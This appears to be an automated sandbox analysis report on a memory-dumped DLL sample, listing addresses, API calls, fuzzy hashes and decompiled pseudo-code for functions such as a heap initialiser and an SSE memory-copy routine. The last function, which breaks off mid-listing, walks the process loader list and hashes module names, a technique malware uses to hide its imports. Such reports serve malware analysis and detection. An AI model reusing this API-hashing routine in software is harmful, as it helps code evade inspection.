0x6ea5c774
0x6ea5c779
0x6ea5c779
0x6ea5c780
0x6ea5c785
0x6ea5c785
0x6ea5c78c
0x6ea5c791
0x6ea5c791
0x6ea5c79b
0x6ea5c79d
0x6ea5c7d7
0x6ea5c79f
0x6ea5c7a4
0x6ea5c7c8
0x6ea5c7d0
0x6ea5c7c4
0x6ea5c7c4
0x6ea5c7da
0x6ea5c7e1
0x6ea5c7e3
0x6ea5c805
0x6ea5c80d
0x6ea5c810
0x6ea5c810
0x6ea5c812
0x6ea5c812
0x6ea5c81d
0x6ea5c823
0x6ea5c828
0x6ea5c82f
0x6ea5c869
0x6ea5c874
0x6ea5c87a
0x6ea5c87d
0x6ea5c880
0x6ea5c88c
0x6ea5c894
0x6ea5c831
0x6ea5c834
0x6ea5c840
0x6ea5c846
0x6ea5c84c
0x6ea5c84f
0x6ea5c858
0x6ea5c858
0x6ea5c897
0x6ea5c8a5
0x6ea5c8ab
0x6ea5c8b2
0x6ea5c8b4
0x6ea5c8b4
0x6ea5c8bb
0x6ea5c8bd
0x6ea5c8bd
0x6ea5c8c4
0x6ea5c8c6
0x6ea5c8c6
0x6ea5c8cd
0x6ea5c8cf
0x6ea5c8cf
0x6ea5c8d6
0x6ea5c8d8
0x6ea5c8d8
0x6ea5c8e5
0x6ea5c8e8
0x6ea5c91f
0x6ea5c8ea
0x6ea5c8ea
0x6ea5c8ed
0x6ea5c918
0x6ea5c90d
0x6ea5c90d
0x6ea5c921
0x6ea5c929
0x6ea5c92c
0x6ea5c94b
0x6ea5c950
0x6ea5c950
0x6ea5c952
0x6ea5c957
0x6ea5c963
0x6ea5c959
0x6ea5c95c
0x6ea5c95c
0x6ea5c968
0x6ea5c968
0x6ea5c92e
0x6ea5c931
0x6ea5c940
0x00000000
0x6ea5c940
0x6ea5c933
0x6ea5c936
0x6ea5c938
0x6ea5c938
0x00000000
0x6ea5c936
0x6ea5c8ef
0x6ea5c8f2
0x6ea5c908
0x00000000
0x6ea5c908
0x6ea5c8f7
0x6ea5c8f9
0x6ea5c8f9
0x6ea5c8f7
0x00000000
0x6ea5c8e8
0x6ea5c7ea
0x6ea5c7f8
0x6ea5c800
0x00000000
0x6ea5c800
0x6ea5c7ee
0x6ea5c7f3
0x6ea5c7f3
0x00000000
0x6ea5c7ee
0x6ea5c7ab
0x6ea5c7b9
0x6ea5c7c1
0x00000000
0x6ea5c7c1
0x6ea5c7af
0x6ea5c7b4
0x6ea5c7b4
0x6ea5c7af

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EA5C673,?,?,00000008,?,?,6EA5C306,00000000), ref: 6EA5C8A5

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3d397e7cfd56f16168b73e7fbfb3dd394d4c68a324a8215aa50ae1799851573c
Instruction ID: 4b3b5fdaef84bed8ef818aa48299ddf9d42cc0b185565d1e6bad38e44fbf86bf
Opcode Fuzzy Hash: 3d397e7cfd56f16168b73e7fbfb3dd394d4c68a324a8215aa50ae1799851573c
Instruction Fuzzy Hash: 15B15736210609DFD744CF68C496B547BE0FF05364F298698E8A9CF3A6C335E9A2CB44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5817A, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA5817A() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x6ea93f18 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x6ea5817a
0x6ea58182
0x6ea5818a

APIs

GetProcessHeap.KERNEL32 ref: 6EA5817A

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ae1f2f4df97c31978ee8a4f46cc6f3f562931ae0971757b4405d4af96f365321
Instruction ID: 179f0be17826ba25e6e9d152ed4e44603ec73105ed6530e195a6c172a93eb4f7
Opcode Fuzzy Hash: ae1f2f4df97c31978ee8a4f46cc6f3f562931ae0971757b4405d4af96f365321
Instruction Fuzzy Hash: 16A01130200B008B8B008E30828C30A3AF8BA02280302C828A00AEE080EA2088828A80

Uniqueness

Uniqueness Score: -1.00%

Function 6EA54940, Relevance: .4, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6EA54940(void* _a4, void* _a8, int _a12) {
				void* _t100;
				signed int _t102;
				void _t110;
				void _t111;
				int _t113;
				unsigned int _t114;
				int _t115;
				int _t125;
				unsigned int _t126;
				int _t127;
				int _t129;
				int _t134;
				signed int _t140;
				unsigned int _t144;
				int _t145;
				int _t147;
				signed int _t153;
				void* _t154;
				signed int _t159;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t176;

				_t163 = _a8;
				_t125 = _a12;
				_t154 = _a4;
				_t100 = _t163 + _t125;
				if(_t154 <= _t163 || _t154 >= _t100) {
					if(_t125 < 0x20) {
						L73:
						_t126 = _t125 & 0x0000001f;
						__eflags = _t126;
						if(_t126 != 0) {
							_t102 = _t126;
							_t127 = _t126 >> 2;
							__eflags = _t127;
							while(_t127 != 0) {
								 *_t154 =  *_t163;
								_t154 = _t154 + 4;
								_t163 = _t163 + 4;
								_t127 = _t127 - 1;
								__eflags = _t127;
							}
							_t129 = _t102 & 0x00000003;
							__eflags = _t129;
							while(_t129 != 0) {
								 *_t154 =  *_t163;
								_t163 = _t163 + 1;
								_t154 = _t154 + 1;
								_t129 = _t129 - 1;
								__eflags = _t129;
							}
						}
						goto L79;
					} else {
						_t176 = _t125 - 0x80;
						if(_t176 >= 0) {
							asm("bt dword [0x6ea93acc], 0x1");
							if(__eflags >= 0) {
								__eflags = (_t154 ^ _t163) & 0x0000000f;
								if(__eflags != 0) {
									L10:
									asm("bt dword [0x6ea93acc], 0x0");
									if(__eflags >= 0) {
										goto L35;
									} else {
										__eflags = _t154 & 0x00000003;
										if((_t154 & 0x00000003) != 0) {
											goto L35;
										} else {
											__eflags = _t163 & 0x00000003;
											if(__eflags == 0) {
												asm("bt edi, 0x2");
												if(__eflags < 0) {
													_t111 =  *_t163;
													_t125 = _t125 - 4;
													__eflags = _t125;
													_t163 = _t163 + 4;
													 *_t154 = _t111;
													_t154 = _t154 + 4;
												}
												asm("bt edi, 0x3");
												if(__eflags < 0) {
													asm("movq xmm1, [esi]");
													_t125 = _t125 - 8;
													__eflags = _t125;
													_t163 = _t163 + 8;
													asm("movq [edi], xmm1");
													_t154 = _t154 + 8;
												}
												__eflags = _t163 & 0x00000007;
												if(__eflags == 0) {
													asm("movdqa xmm1, [esi-0x8]");
													_t164 = _t163 - 8;
													do {
														asm("movdqa xmm3, [esi+0x10]");
														_t125 = _t125 - 0x30;
														asm("movdqa xmm0, [esi+0x20]");
														asm("movdqa xmm5, [esi+0x30]");
														_t164 = _t164 + 0x30;
														__eflags = _t125 - 0x30;
														asm("movdqa xmm2, xmm3");
														asm("palignr xmm3, xmm1, 0x8");
														asm("movdqa [edi], xmm3");
														asm("movdqa xmm4, xmm0");
														asm("palignr xmm0, xmm2, 0x8");
														asm("movdqa [edi+0x10], xmm0");
														asm("movdqa xmm1, xmm5");
														asm("palignr xmm5, xmm4, 0x8");
														asm("movdqa [edi+0x20], xmm5");
														_t154 = _t154 + 0x30;
													} while (_t125 >= 0x30);
													_t163 = _t164 + 8;
												} else {
													asm("bt esi, 0x3");
													if(__eflags >= 0) {
														asm("movdqa xmm1, [esi-0x4]");
														_t165 = _t163 - 4;
														do {
															asm("movdqa xmm3, [esi+0x10]");
															_t125 = _t125 - 0x30;
															asm("movdqa xmm0, [esi+0x20]");
															asm("movdqa xmm5, [esi+0x30]");
															_t165 = _t165 + 0x30;
															__eflags = _t125 - 0x30;
															asm("movdqa xmm2, xmm3");
															asm("palignr xmm3, xmm1, 0x4");
															asm("movdqa [edi], xmm3");
															asm("movdqa xmm4, xmm0");
															asm("palignr xmm0, xmm2, 0x4");
															asm("movdqa [edi+0x10], xmm0");
															asm("movdqa xmm1, xmm5");
															asm("palignr xmm5, xmm4, 0x4");
															asm("movdqa [edi+0x20], xmm5");
															_t154 = _t154 + 0x30;
														} while (_t125 >= 0x30);
														_t163 = _t165 + 4;
														while(1) {
															L28:
															__eflags = _t125 - 0x10;
															if(__eflags < 0) {
																break;
															}
															asm("movdqu xmm1, [esi]");
															_t125 = _t125 - 0x10;
															_t163 = _t163 + 0x10;
															asm("movdqa [edi], xmm1");
															_t154 = _t154 + 0x10;
														}
														asm("bt ecx, 0x2");
														if(__eflags < 0) {
															_t110 =  *_t163;
															_t125 = _t125 - 4;
															__eflags = _t125;
															_t163 = _t163 + 4;
															 *_t154 = _t110;
															_t154 = _t154 + 4;
														}
														asm("bt ecx, 0x3");
														if(__eflags < 0) {
															asm("movq xmm1, [esi]");
															__eflags = _t125;
															_t163 = _t163 + 8;
															asm("movq [edi], xmm1");
															_t154 = _t154 + 8;
														}
														goto __eax;
													}
													asm("movdqa xmm1, [esi-0xc]");
													_t166 = _t163 - 0xc;
													do {
														asm("movdqa xmm3, [esi+0x10]");
														_t125 = _t125 - 0x30;
														asm("movdqa xmm0, [esi+0x20]");
														asm("movdqa xmm5, [esi+0x30]");
														_t166 = _t166 + 0x30;
														__eflags = _t125 - 0x30;
														asm("movdqa xmm2, xmm3");
														asm("palignr xmm3, xmm1, 0xc");
														asm("movdqa [edi], xmm3");
														asm("movdqa xmm4, xmm0");
														asm("palignr xmm0, xmm2, 0xc");
														asm("movdqa [edi+0x10], xmm0");
														asm("movdqa xmm1, xmm5");
														asm("palignr xmm5, xmm4, 0xc");
														asm("movdqa [edi+0x20], xmm5");
														_t154 = _t154 + 0x30;
													} while (_t125 >= 0x30);
													_t163 = _t166 + 0xc;
												}
												goto L28;
											}
										}
									}
									goto L37;
								} else {
									asm("bt dword [0x6ea93010], 0x1");
									if(__eflags < 0) {
										_t113 = _t163 & 0x0000000f;
										__eflags = _t113;
										if(_t113 != 0) {
											_push(_t125 - 0x10);
											_t114 = 0x10 - _t113;
											_t134 = _t114 & 0x00000003;
											__eflags = _t134;
											while(_t134 != 0) {
												 *_t154 =  *_t163;
												_t163 = _t163 + 1;
												_t154 = _t154 + 1;
												_t134 = _t134 - 1;
												__eflags = _t134;
											}
											_t115 = _t114 >> 2;
											__eflags = _t115;
											while(_t115 != 0) {
												 *_t154 =  *_t163;
												_t163 = _t163 + 4;
												_t154 = _t154 + 4;
												_t115 = _t115 - 1;
												__eflags = _t115;
											}
											_pop(_t125);
										}
										_t144 = _t125;
										_t125 = _t125 & 0x0000007f;
										_t145 = _t144 >> 7;
										__eflags = _t145;
										while(_t145 != 0) {
											asm("movdqa xmm0, [esi]");
											asm("movdqa xmm1, [esi+0x10]");
											asm("movdqa xmm2, [esi+0x20]");
											asm("movdqa xmm3, [esi+0x30]");
											asm("movdqa [edi], xmm0");
											asm("movdqa [edi+0x10], xmm1");
											asm("movdqa [edi+0x20], xmm2");
											asm("movdqa [edi+0x30], xmm3");
											asm("movdqa xmm4, [esi+0x40]");
											asm("movdqa xmm5, [esi+0x50]");
											asm("movdqa xmm6, [esi+0x60]");
											asm("movdqa xmm7, [esi+0x70]");
											asm("movdqa [edi+0x40], xmm4");
											asm("movdqa [edi+0x50], xmm5");
											asm("movdqa [edi+0x60], xmm6");
											asm("movdqa [edi+0x70], xmm7");
											_t163 = _t163 + 0x80;
											_t154 = _t154 + 0x80;
											_t145 = _t145 - 1;
											__eflags = _t145;
										}
										goto L69;
									} else {
										goto L10;
									}
								}
							} else {
								memcpy(_t154, _t163, _t125);
								return _a4;
							}
						} else {
							asm("bt dword [0x6ea93010], 0x1");
							if(_t176 < 0) {
								L69:
								__eflags = _t125;
								if(_t125 != 0) {
									_t147 = _t125 >> 5;
									__eflags = _t147;
									if(_t147 != 0) {
										do {
											asm("movdqu xmm0, [esi]");
											asm("movdqu xmm1, [esi+0x10]");
											asm("movdqu [edi], xmm0");
											asm("movdqu [edi+0x10], xmm1");
											_t163 = _t163 + 0x20;
											_t154 = _t154 + 0x20;
											_t147 = _t147 - 1;
											__eflags = _t147;
										} while (_t147 != 0);
									}
									goto L73;
								}
								L79:
								return _a4;
							} else {
								L35:
								while((_t154 & 0x00000003) != 0) {
									 *_t154 =  *_t163;
									_t125 = _t125 - 1;
									_t163 = _t163 + 1;
									_t154 = _t154 + 1;
								}
								L37:
								_t140 = _t125;
								if(_t125 < 0x20) {
									goto L73;
								} else {
									memcpy(_t154, _t163, _t125 >> 2 << 2);
									switch( *((intOrPtr*)((_t140 & 0x00000003) * 4 +  &M6EA54BA4))) {
										case 0:
											return _a4;
											goto L85;
										case 1:
											 *__edi =  *__esi;
											__eax = _a4;
											return _a4;
											goto L85;
										case 2:
											 *__edi =  *__esi;
											_t46 = __esi + 1; // 0x45c70cc4
											 *((char*)(__edi + 1)) =  *_t46;
											__eax = _a4;
											return _a4;
											goto L85;
										case 3:
											 *__edi =  *__esi;
											 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
											 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
											__eax = _a4;
											return _a4;
											goto L85;
									}
								}
							}
						}
					}
				} else {
					_t167 = _t163 + _t125;
					_t159 = _t154 + _t125;
					__eflags = _t125 - 0x20;
					if(__eflags < 0) {
						L60:
						__eflags = _t125 & 0xfffffffc;
						while((_t125 & 0xfffffffc) != 0) {
							_t159 = _t159 - 4;
							_t167 = _t167 - 4;
							 *_t159 =  *_t167;
							_t125 = _t125 - 4;
							__eflags = _t125 & 0xfffffffc;
						}
						__eflags = _t125;
						if(_t125 != 0) {
							do {
								_t159 = _t159 - 1;
								_t167 = _t167 - 1;
								 *_t159 =  *_t167;
								_t125 = _t125 - 1;
								__eflags = _t125;
							} while (_t125 != 0);
						}
						return _a4;
					} else {
						asm("bt dword [0x6ea93010], 0x1");
						if(__eflags < 0) {
							__eflags = _t159 & 0x0000000f;
							if((_t159 & 0x0000000f) != 0) {
								do {
									_t125 = _t125 - 1;
									_t167 = _t167 - 1;
									_t159 = _t159 - 1;
									 *_t159 =  *_t167;
									__eflags = _t159 & 0x0000000f;
								} while ((_t159 & 0x0000000f) != 0);
								while(1) {
									L56:
									__eflags = _t125 - 0x80;
									if(_t125 < 0x80) {
										break;
									}
									_t167 = _t167 - 0x80;
									_t159 = _t159 - 0x80;
									asm("movdqu xmm0, [esi]");
									asm("movdqu xmm1, [esi+0x10]");
									asm("movdqu xmm2, [esi+0x20]");
									asm("movdqu xmm3, [esi+0x30]");
									asm("movdqu xmm4, [esi+0x40]");
									asm("movdqu xmm5, [esi+0x50]");
									asm("movdqu xmm6, [esi+0x60]");
									asm("movdqu xmm7, [esi+0x70]");
									asm("movdqu [edi], xmm0");
									asm("movdqu [edi+0x10], xmm1");
									asm("movdqu [edi+0x20], xmm2");
									asm("movdqu [edi+0x30], xmm3");
									asm("movdqu [edi+0x40], xmm4");
									asm("movdqu [edi+0x50], xmm5");
									asm("movdqu [edi+0x60], xmm6");
									asm("movdqu [edi+0x70], xmm7");
									_t125 = _t125 - 0x80;
									__eflags = _t125 & 0xffffff80;
									if((_t125 & 0xffffff80) != 0) {
										continue;
									}
									break;
								}
								__eflags = _t125 - 0x20;
								if(_t125 >= 0x20) {
									do {
										_t167 = _t167 - 0x20;
										_t159 = _t159 - 0x20;
										asm("movdqu xmm0, [esi]");
										asm("movdqu xmm1, [esi+0x10]");
										asm("movdqu [edi], xmm0");
										asm("movdqu [edi+0x10], xmm1");
										_t125 = _t125 - 0x20;
										__eflags = _t125 & 0xffffffe0;
									} while ((_t125 & 0xffffffe0) != 0);
								}
								goto L60;
							}
							goto L56;
						} else {
							__eflags = _t159 & 0x00000003;
							if((_t159 & 0x00000003) != 0) {
								_t153 = _t159 & 0x00000003;
								_t125 = _t125 - _t153;
								__eflags = _t125;
								do {
									 *(_t159 - 1) =  *((intOrPtr*)(_t167 - 1));
									_t167 = _t167 - 1;
									_t159 = _t159 - 1;
									_t153 = _t153 - 1;
									__eflags = _t153;
								} while (_t153 != 0);
							}
							__eflags = _t125 - 0x20;
							if(_t125 < 0x20) {
								goto L60;
							} else {
								asm("std");
								memcpy(_t159 - 4, _t167 - 4, _t125 >> 2 << 2);
								asm("cld");
								switch( *((intOrPtr*)((_t125 & 0x00000003) * 4 +  &M6EA54C50))) {
									case 0:
										return _a4;
										goto L85;
									case 1:
										 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
										__eax = _a4;
										return _a4;
										goto L85;
									case 2:
										_t67 = __esi + 3; // 0xbc45c7
										 *((char*)(__edi + 3)) =  *_t67;
										_t69 = __esi + 2; // 0xbc45c70c
										 *((char*)(__edi + 2)) =  *_t69;
										__eax = _a4;
										return _a4;
										goto L85;
									case 3:
										 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
										 *((char*)(__edi + 2)) =  *((intOrPtr*)(__esi + 2));
										 *((char*)(__edi + 1)) =  *((intOrPtr*)(__esi + 1));
										__eax = _a4;
										return _a4;
										goto L85;
								}
							}
						}
					}
				}
				L85:
			}

0x6ea54942
0x6ea54946
0x6ea5494a
0x6ea54952
0x6ea54956
0x6ea54963
0x6ea54e3b
0x6ea54e3b
0x6ea54e3b
0x6ea54e3e
0x6ea54e40
0x6ea54e42
0x6ea54e42
0x6ea54e45
0x6ea54e49
0x6ea54e4b
0x6ea54e4e
0x6ea54e51
0x6ea54e51
0x6ea54e51
0x6ea54e58
0x6ea54e58
0x6ea54e5b
0x6ea54e5f
0x6ea54e61
0x6ea54e62
0x6ea54e63
0x6ea54e63
0x6ea54e63
0x6ea54e5b
0x00000000
0x6ea54969
0x6ea54969
0x6ea5496f
0x6ea54984
0x6ea5498c
0x6ea5499b
0x6ea549a0
0x6ea549b0
0x6ea549b0
0x6ea549b8
0x00000000
0x6ea549be
0x6ea549be
0x6ea549c4
0x00000000
0x6ea549ca
0x6ea549ca
0x6ea549d0
0x6ea549d6
0x6ea549da
0x6ea549dc
0x6ea549de
0x6ea549de
0x6ea549e1
0x6ea549e4
0x6ea549e6
0x6ea549e6
0x6ea549e9
0x6ea549ed
0x6ea549ef
0x6ea549f3
0x6ea549f3
0x6ea549f6
0x6ea549f9
0x6ea549fd
0x6ea549fd
0x6ea54a00
0x6ea54a06
0x6ea54a6d
0x6ea54a72
0x6ea54a78
0x6ea54a78
0x6ea54a7d
0x6ea54a80
0x6ea54a85
0x6ea54a8a
0x6ea54a8d
0x6ea54a90
0x6ea54a94
0x6ea54a9a
0x6ea54a9e
0x6ea54aa2
0x6ea54aa8
0x6ea54aad
0x6ea54ab1
0x6ea54ab7
0x6ea54abc
0x6ea54abc
0x6ea54ac1
0x6ea54a08
0x6ea54a08
0x6ea54a0c
0x6ea54ac6
0x6ea54acb
0x6ea54ad0
0x6ea54ad0
0x6ea54ad5
0x6ea54ad8
0x6ea54add
0x6ea54ae2
0x6ea54ae5
0x6ea54ae8
0x6ea54aec
0x6ea54af2
0x6ea54af6
0x6ea54afa
0x6ea54b00
0x6ea54b05
0x6ea54b09
0x6ea54b0f
0x6ea54b14
0x6ea54b14
0x6ea54b19
0x6ea54b1c
0x6ea54b1c
0x6ea54b1c
0x6ea54b1f
0x00000000
0x00000000
0x6ea54b21
0x6ea54b25
0x6ea54b28
0x6ea54b2b
0x6ea54b2f
0x6ea54b2f
0x6ea54b34
0x6ea54b38
0x6ea54b3a
0x6ea54b3c
0x6ea54b3c
0x6ea54b3f
0x6ea54b42
0x6ea54b44
0x6ea54b44
0x6ea54b47
0x6ea54b4b
0x6ea54b4d
0x6ea54b51
0x6ea54b54
0x6ea54b57
0x6ea54b5b
0x6ea54b5b
0x6ea54b65
0x6ea54b65
0x6ea54a12
0x6ea54a17
0x6ea54a1c
0x6ea54a1c
0x6ea54a21
0x6ea54a24
0x6ea54a29
0x6ea54a2e
0x6ea54a31
0x6ea54a34
0x6ea54a38
0x6ea54a3e
0x6ea54a42
0x6ea54a46
0x6ea54a4c
0x6ea54a51
0x6ea54a55
0x6ea54a5b
0x6ea54a60
0x6ea54a60
0x6ea54a65
0x6ea54a65
0x00000000
0x6ea54a06
0x6ea549d0
0x6ea549c4
0x00000000
0x6ea549a2
0x6ea549a2
0x6ea549aa
0x6ea54d92
0x6ea54d95
0x6ea54d97
0x6ea54e89
0x6ea54e8a
0x6ea54e8e
0x6ea54e8e
0x6ea54e91
0x6ea54e95
0x6ea54e97
0x6ea54e98
0x6ea54e99
0x6ea54e99
0x6ea54e99
0x6ea54e9c
0x6ea54e9c
0x6ea54e9f
0x6ea54ea3
0x6ea54ea5
0x6ea54ea8
0x6ea54eab
0x6ea54eab
0x6ea54eab
0x6ea54eae
0x6ea54eae
0x6ea54d9d
0x6ea54d9f
0x6ea54da2
0x6ea54da2
0x6ea54da5
0x6ea54db0
0x6ea54db4
0x6ea54db9
0x6ea54dbe
0x6ea54dc3
0x6ea54dc7
0x6ea54dcc
0x6ea54dd1
0x6ea54dd6
0x6ea54ddb
0x6ea54de0
0x6ea54de5
0x6ea54dea
0x6ea54def
0x6ea54df4
0x6ea54df9
0x6ea54dfe
0x6ea54e04
0x6ea54e0a
0x6ea54e0a
0x6ea54e0a
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea549aa
0x6ea5498e
0x6ea5498e
0x6ea54996
0x6ea54996
0x6ea54971
0x6ea54971
0x6ea54979
0x6ea54e0d
0x6ea54e0d
0x6ea54e0f
0x6ea54e13
0x6ea54e16
0x6ea54e18
0x6ea54e20
0x6ea54e20
0x6ea54e24
0x6ea54e29
0x6ea54e2d
0x6ea54e32
0x6ea54e35
0x6ea54e38
0x6ea54e38
0x6ea54e38
0x6ea54e20
0x00000000
0x6ea54e18
0x6ea54e70
0x6ea54e76
0x6ea5497f
0x6ea54b67
0x6ea54b6d
0x6ea54b71
0x6ea54b73
0x6ea54b74
0x6ea54b77
0x6ea54b7a
0x6ea54b82
0x6ea54b82
0x6ea54b87
0x00000000
0x6ea54b8d
0x6ea54b90
0x6ea54b95
0x00000000
0x6ea54bba
0x00000000
0x00000000
0x6ea54bbe
0x6ea54bc0
0x6ea54bc6
0x00000000
0x00000000
0x6ea54bca
0x6ea54bcc
0x6ea54bcf
0x6ea54bd2
0x6ea54bd8
0x00000000
0x00000000
0x6ea54bde
0x6ea54be3
0x6ea54be9
0x6ea54bec
0x6ea54bf2
0x00000000
0x00000000
0x6ea54b95
0x6ea54b87
0x6ea54979
0x6ea5496f
0x6ea54bf4
0x6ea54bf4
0x6ea54bf7
0x6ea54bfa
0x6ea54bfd
0x6ea54d54
0x6ea54d54
0x6ea54d5a
0x6ea54d5c
0x6ea54d5f
0x6ea54d64
0x6ea54d66
0x6ea54d69
0x6ea54d69
0x6ea54d71
0x6ea54d73
0x6ea54d75
0x6ea54d75
0x6ea54d78
0x6ea54d7d
0x6ea54d7f
0x6ea54d7f
0x6ea54d7f
0x6ea54d75
0x6ea54d8a
0x6ea54c03
0x6ea54c03
0x6ea54c0b
0x6ea54ca5
0x6ea54cab
0x6ea54cad
0x6ea54cad
0x6ea54cae
0x6ea54caf
0x6ea54cb2
0x6ea54cb4
0x6ea54cb4
0x6ea54cbc
0x6ea54cbc
0x6ea54cbc
0x6ea54cc2
0x00000000
0x00000000
0x6ea54cc4
0x6ea54cca
0x6ea54cd0
0x6ea54cd4
0x6ea54cd9
0x6ea54cde
0x6ea54ce3
0x6ea54ce8
0x6ea54ced
0x6ea54cf2
0x6ea54cf7
0x6ea54cfb
0x6ea54d00
0x6ea54d05
0x6ea54d0a
0x6ea54d0f
0x6ea54d14
0x6ea54d19
0x6ea54d1e
0x6ea54d24
0x6ea54d2a
0x00000000
0x00000000
0x00000000
0x6ea54d2a
0x6ea54d2c
0x6ea54d2f
0x6ea54d31
0x6ea54d31
0x6ea54d34
0x6ea54d37
0x6ea54d3b
0x6ea54d40
0x6ea54d44
0x6ea54d49
0x6ea54d4c
0x6ea54d4c
0x6ea54d31
0x00000000
0x6ea54d2f
0x00000000
0x6ea54c11
0x6ea54c11
0x6ea54c17
0x6ea54c1b
0x6ea54c1e
0x6ea54c1e
0x6ea54c20
0x6ea54c23
0x6ea54c26
0x6ea54c27
0x6ea54c28
0x6ea54c28
0x6ea54c28
0x6ea54c20
0x6ea54c2d
0x6ea54c30
0x00000000
0x6ea54c36
0x6ea54c44
0x6ea54c45
0x6ea54c47
0x6ea54c48
0x00000000
0x6ea54c66
0x00000000
0x00000000
0x6ea54c6b
0x6ea54c6e
0x6ea54c74
0x00000000
0x00000000
0x6ea54c78
0x6ea54c7b
0x6ea54c7e
0x6ea54c81
0x6ea54c84
0x6ea54c8a
0x00000000
0x00000000
0x6ea54c8f
0x6ea54c95
0x6ea54c9b
0x6ea54c9e
0x6ea54ca4
0x00000000
0x00000000
0x6ea54c48
0x6ea54c30
0x6ea54c0b
0x6ea54bfd
0x00000000

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbf32378b5f77422ebbea402f7eeccf808f14736dceac520f5e89fdf65af6515
Instruction ID: 4dd6fe6100b262df6d75350f7b995137869d3b56d68061122ad4e6bf22d6a931
Opcode Fuzzy Hash: dbf32378b5f77422ebbea402f7eeccf808f14736dceac520f5e89fdf65af6515
Instruction Fuzzy Hash: 37F1E136918B838AE7268F7C94012A5FBB1BFD6310F149B1DDDE663E05D730A666C384

Uniqueness

Uniqueness Score: -1.00%

Function 6EA52DF0, Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c36526dba21685467946f954465a6d5da905229e5f77774c9a4601c79bcee020
Instruction ID: a966cd55c2ed89a9136d6a0574332799a764d18da6d111e2994b0711d5c58972
Opcode Fuzzy Hash: c36526dba21685467946f954465a6d5da905229e5f77774c9a4601c79bcee020
Instruction Fuzzy Hash: 68E1BC71A00206CFCB54CF99C890BA9B7F1FF89314F2981A9D845AB349D335EDA5CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA528D0, Relevance: .1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA528D0(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t48;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t66;
				intOrPtr* _t67;
				signed char _t68;
				intOrPtr _t70;
				signed int _t74;
				intOrPtr _t80;
				signed int _t81;
				intOrPtr _t82;
				signed int _t84;
				signed short* _t88;
				signed int _t89;
				signed short _t90;
				intOrPtr* _t92;

				_v20 = __ecx;
				_v24 = __edx;
				_t67 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t70 =  *((intOrPtr*)(_t67 + 0x18));
				_v8 = _t70;
				if(_t70 == 0) {
					L16:
					return 0;
				} else {
					do {
						_t88 =  *(_t67 + 0x30);
						_t67 =  *_t67;
						_v28 = _t67;
						_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t70 + 0x3c)) + _t70 + 0x78));
						if(_t48 != 0) {
							_t90 =  *_t88 & 0x0000ffff;
							_t80 = _t48 + _t70;
							_v16 =  *((intOrPtr*)(_t80 + 0x18));
							_v32 = _t80;
							_t51 =  *((intOrPtr*)(_t80 + 0x20)) + _t70;
							_t81 = 0;
							_v12 = _t51;
							if(_t90 != 0) {
								do {
									_t18 = _t90 + 0x20; // 0x20
									_t88 =  &(_t88[1]);
									_t78 =  >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff;
									_t64 = ( >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff) & 0x0000ffff;
									_t81 = _t81 * 0x00000101 + (( >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff) & 0x0000ffff) ^ (( >=  ? _t90 & 0x0000ffff : _t18 & 0x0000ffff) & 0x0000ffff) << 0x00000010;
